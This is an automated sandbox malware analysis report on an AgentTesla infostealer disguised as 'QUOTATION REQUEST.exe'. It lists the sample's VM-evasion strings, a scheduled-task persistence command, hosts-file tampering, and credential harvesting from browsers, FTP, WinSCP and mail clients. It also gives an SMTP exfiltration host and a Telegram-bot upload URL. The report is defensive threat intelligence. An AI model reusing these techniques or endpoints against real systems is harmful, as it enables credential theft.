Source: RegSvcs.exe, 00000003.00000002.467751584.00000000064B0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RegSvcs.exe, 00000003.00000002.467751584.00000000064B0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: QUOTATION REQUEST.exe, 00000000.00000002.212705548.0000000002E3E000.00000004.00000001.sdmp | Binary or memory string: VMware
Source: QUOTATION REQUEST.exe, 00000000.00000002.212705548.0000000002E3E000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: QUOTATION REQUEST.exe, 00000000.00000002.212705548.0000000002E3E000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: RegSvcs.exe, 00000003.00000002.467751584.00000000064B0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp'
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
Source: RegSvcs.exe, 00000003.00000002.463897257.0000000001D80000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000003.00000002.463897257.0000000001D80000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000003.00000002.463897257.0000000001D80000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: RegSvcs.exe, 00000003.00000002.463897257.0000000001D80000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Queries volume information: C:\Users\user\Desktop\QUOTATION REQUEST.exe VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Queries volume information: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Queries volume information: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File written: C:\Windows\System32\drivers\etc\hosts

              Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: QUOTATION REQUEST.exe PID: 5388, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1564, type: MEMORY
Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1564, type: MEMORY

              Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: QUOTATION REQUEST.exe PID: 5388, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1564, type: MEMORY
Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Scheduled Task/Job 1 | Process Injection 12 | File and Directory Permissions Modification 1 | OS Credential Dumping 2 | File and Directory Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job 1 | Registry Run Keys / Startup Folder 1 | Scheduled Task/Job 1 | Disable or Modify Tools 1 | Input Capture 1 | System Information Discovery 114 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Registry Run Keys / Startup Folder 1 | Obfuscated Files or Information 2 | Credentials in Registry 1 | Query Registry 1 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 12 | NTDS | Security Software Discovery 321 | Distributed Component Object Model | Input Capture 1 | Scheduled Transfer | Application Layer Protocol 11 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 | LSA Secrets | Virtualization/Sandbox Evasion 14 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 14 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 12 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories 1 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

              Behavior Graph

Behavior Graph ID: 321450 | Sample: QUOTATION REQUEST.exe | Startdate: 22/11/2020 | Architecture: WINDOWS | Score: 100

Top-level signatures shown in the graph: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Multi AV Scanner detection for dropped file; 10 other signatures

Process tree recovered from the graph:

• QUOTATION REQUEST.exe (started): drops C:\Users\user\AppData\...\GtVSibeZGs.exe (PE32), C:\Users\user\AppData\Local\Temp\tmpCA2.tmp (XML) and C:\Users\user\...\QUOTATION REQUEST.exe.log (ASCII); starts RegSvcs.exe and schtasks.exe
• RegSvcs.exe: contacts mail.hemetek.com (107.6.134.138, 49738, 587, SINGLEHOP-LLCUS, United States); drops C:\Users\user\AppData\Roaming\...\lEmohP.exe (PE32) and C:\Windows\System32\drivers\etc\hosts (ASCII); signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file access); 5 other signatures
• schtasks.exe: starts conhost.exe
• lEmohP.exe (started twice): each instance starts conhost.exe


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
QUOTATION REQUEST.exe | 53% | Virustotal |
QUOTATION REQUEST.exe | 52% | ReversingLabs | ByteCode-MSIL.Infostealer.Stelega
QUOTATION REQUEST.exe | 100% | Joe Sandbox ML |

              Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\GtVSibeZGs.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\GtVSibeZGs.exe | 52% | ReversingLabs | ByteCode-MSIL.Infostealer.Stelega
C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | 0% | Metadefender |
C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe | 0% | ReversingLabs |

              Unpacked PE Files

Source | Detection | Scanner | Label
3.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

              Domains

Source | Detection | Scanner | Label
mail.hemetek.com | 0% | Virustotal |

              URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://C0BJotQhI3.net | 0% | Avira URL Cloud | safe
http://TDhznh.com | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://mail.hemetek.com | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
https://api.ipify.orgGETMozilla/5.0 | 0% | URL Reputation | safe
https://api.ipify.orgGETMozilla/5.0 | 0% | URL Reputation | safe
https://api.ipify.orgGETMozilla/5.0 | 0% | URL Reputation | safe

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.hemetek.com | 107.6.134.138 | true | true | | unknown

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
http://C0BJotQhI3.net | RegSvcs.exe, 00000003.00000002.465723831.0000000003696000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.465745478.00000000036A0000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.465591581.0000000003659000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://TDhznh.com | RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmp | false | | high
https://api.telegram.org/bot%telegramapi%/ | QUOTATION REQUEST.exe, 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmp | false | | high
http://mail.hemetek.com | RegSvcs.exe, 00000003.00000002.465723831.0000000003696000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x | RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | QUOTATION REQUEST.exe, 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://api.ipify.orgGETMozilla/5.0 | RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown

                    Contacted IPs


                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
107.6.134.138 | unknown | United States | 32475 | SINGLEHOP-LLCUS | true

                    General Information

                    Joe Sandbox Version:31.0.0 Red Diamond
                    Analysis ID:321450
                    Start date:22.11.2020
                    Start time:08:24:11
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 7m 52s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:QUOTATION REQUEST.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:28
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.adwa.spyw.evad.winEXE@10/8@1/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.193.48, 168.61.161.212, 51.104.139.180, 92.122.144.200, 20.54.26.129, 8.248.147.254, 8.241.9.126, 8.248.117.254, 8.241.121.126, 8.248.125.254, 8.253.204.121, 8.241.123.254, 8.241.121.254, 92.122.213.194, 92.122.213.247, 51.104.144.132
                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

Time | Type | Description
08:24:55 | API Interceptor | 62x Sleep call for process: QUOTATION REQUEST.exe modified
08:25:10 | API Interceptor | 843x Sleep call for process: RegSvcs.exe modified
08:25:22 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run lEmohP C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
08:25:30 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run lEmohP C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe

                    Joe Sandbox View / Context

                    IPs

Match: 107.6.134.138
Associated Sample Name / URL | Detection | Context
XbJ1zfehhU.exe | malicious |
shipping documents.exe | malicious |

                        Domains

Match: mail.hemetek.com
Associated Sample Name / URL | Detection | Context
XbJ1zfehhU.exe | malicious | 107.6.134.138
shipping documents.exe | malicious | 107.6.134.138

                        ASN

Match: SINGLEHOP-LLCUS
Associated Sample Name / URL | Detection | Context
payment advice.xls | malicious | 65.60.1.236
https://app.clio.com/link/AxWtfjmmzhja | malicious | 198.143.164.252
http://img.delta-search.com | malicious | 198.143.128.241
https://achas.com.br/wp-includes/certificates/ssl.html | malicious | 198.143.164.252
Sales_Invoice_503657_415470.xls | malicious | 107.6.152.20
EjwyvX23Ry.exe | malicious | 96.127.138.234
XbJ1zfehhU.exe | malicious | 107.6.134.138
Invoice.exe | malicious | 172.96.186.206
HMT-200810-02.exe | malicious | 107.6.169.82
http://lzuanhi.glorygc.com/%40120%40240%40 | malicious | 69.175.104.242
shipping documents.exe | malicious | 107.6.134.138
PROOF OF PAYMENT.exe | malicious | 198.20.116.197
20200728.doc | malicious | 198.20.110.125
IBC_100120_CTX_102720.doc | malicious | 184.154.69.125
IBC_100120_CTX_102720.doc | malicious | 184.154.69.125
PO SHEET pdf.exe | malicious | 96.127.138.234
SELECTED PRODUCTS NEEDED pdf.exe | malicious | 96.127.138.234
iArpr7yhpo.exe | malicious | 96.127.138.234
Byxmlltd72.exe | malicious | 69.175.35.82
order confirmation nr. AB-1006779.pdf..exe | malicious | 96.127.138.234

                        JA3 Fingerprints

                        No context

                        Dropped Files

Match: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
Associated Sample Name / URL | Detection | Context
kAUs7lSQgh.exe | malicious |
Invoice 802737.exe | malicious |
order SS21-031 - A30.exe | malicious |
SOA.exe | malicious |
updated statement of account showing a balance due.exe | malicious |
INV.NO.213242021.exe | malicious |
INV.NO.213000242021.exe | malicious |
pdf.exe | malicious |
statement of account.exe | malicious |
FINAL DOC.exe | malicious |
0nv9EKtCMv.exe | malicious |
XbJ1zfehhU.exe | malicious |
RC2jmpuEYE.exe | malicious |
QUATATION INQUIRY.exe | malicious |
SOA of AUGUST 2020.exe | malicious |
Quotation Inquiry.exe | malicious |
770k.exe | malicious |
c9AwI0x6lR.exe | malicious |
HoNa6vG013.exe | malicious |
SHIPPING DOCS..exe | malicious |

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION REQUEST.exe.log
                                                                Process:C:\Users\user\Desktop\QUOTATION REQUEST.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1301
                                                                Entropy (8bit):5.345637324625647
                                                                Encrypted:false
                                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
                                                                MD5:6C42AAF2F2FABAD2BAB70543AE48CEDB
                                                                SHA1:8552031F83C078FE1C035191A32BA43261A63DA9
                                                                SHA-256:51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
                                                                SHA-512:014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
                                                                Malicious:true
                                                                Reputation:moderate, very likely benign file
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lEmohP.exe.log
                                                                Process:C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):142
                                                                Entropy (8bit):5.090621108356562
                                                                Encrypted:false
